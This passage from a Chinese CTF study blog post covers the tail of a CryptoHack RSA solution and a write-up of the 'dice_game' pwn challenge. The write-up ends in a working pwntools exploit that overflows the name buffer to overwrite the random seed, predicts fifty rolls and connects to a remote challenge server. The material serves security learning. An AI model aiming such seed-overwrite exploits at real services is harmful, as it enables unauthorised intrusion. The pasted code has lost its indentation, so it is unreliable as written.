cipher = 20304610279578186738172766224224793119885071262464464448863461184092225736054747976985179673905441502689126216282897704508745403799054734121583968853999791604281615154100736259131453424385364324630229671185343778172807262640709301838274824603101692485662726226902121105591137437331463201881264245562214012160875177167442010952439360623396658974413900469093836794752270399520074596329058725874834082188697377597949405779039139194196065364426213208345461407030771089787529200057105746584493554722790592530472869581310117300343461207750821737840042745530876391793484035024644475535353227851321505537398888106855012746117
k = (e*d-1)//N
phi = (e*d-1)//(k+1) #k=2
for key in friend_keys:
d = inverse(key[1], phi)
cipher = pow(cipher, d, N)
print(long_to_bytes(cipher))
#crypto{*******_y0ur_s3cr3t_w1th_y0ur_fr1end5_publ1c_k3y}
PWN
2021级田睿敏 | 骰子进阶
随机数一般就是覆盖随机数的种子,然后计算出所有随机数,需要学习随机数函数,栈溢出。
攻防世界:dice_game
拿到文件检测是64位只有栈上没开保护,推测是栈溢出。
用ida反编译。
看一下sub_A20函数
是在玩一个猜数游戏,
v8要从1循环到50,猜对50次执行sub_B28。
看一下sub_B28函数 。
会打开flag。
其中有两个输入点,一开始需要输入名字,然后是猜的数字。漏洞肯定是在输入名字时产生的,这个游戏不用名字也能玩,为啥要加个名字呢,提示就在其中。
在读取名字的时候,把名字存在buf里面,而seed,随机数产生的种子,就在buf前面,从buf溢出覆盖seed,然后换掉就能自己计算出后来的随机数。
from pwn import *
from ctypes import *
context.log_level="info"
i = remote('111.200.241.244',50591)
#i = process("./dice_game")
libc = cdll.LoadLibrary("libc.so.6")
i.recvuntil("Welcome, let me know your name:")
payload = b'a'*0x40 + p64(0)
i.sendline(payload)
libc.srand(0)
for c in range(1,51):
i.recvuntil("Give me the point(1~6): ")
i.sendline(str(libc.rand()%6+1))
i.interactive()
50次全算对,打开flag。
原文始发于微信公众号(山警网络空间安全实验室):皮蛋厂的学习日记 2022.1.21 CRYPTOHACK RSA 刷题记录 & 骰子进阶
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论